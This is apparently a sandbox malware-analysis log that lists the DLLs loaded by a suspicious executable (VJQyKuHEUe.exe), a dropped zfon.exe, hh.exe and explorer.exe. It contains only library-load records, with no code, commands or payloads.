Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: libcef.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: libcef.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: dinput8.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: devenum.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: idstore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wlidprov.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: appextension.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cldapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fltlib.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wincorlib.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: applicationframe.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: npsm.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mscms.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: tdh.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uianimation.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: stobject.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: daxexec.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: container.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cryptngc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cflapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: batmeter.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: inputswitch.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: prnfldr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: actioncenter.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: syncreg.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: audioses.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: pnidui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mobilenetworking.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wscinterop.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: networkuxbroker.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wpnclient.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ethernetmediamanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dusmapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: storageusage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: credui.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wdscore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wpdshserviceobj.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: portabledevicetypes.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: portabledeviceapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscobj.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: srchadmin.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: synccenter.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: imapi2.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ncsi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ieproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: settingsync.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: settingsynccore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wpnapps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.xaml.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowsinternal.composableshell.desktophosting.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uiamanager.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: libcef.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: msvcp140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: libcef.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: msvcp140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: libcef.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: msvcp140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: msvcp140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: libcef.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: msvcp140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: msvcp140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: libcef.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: msvcp140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140_1.dll
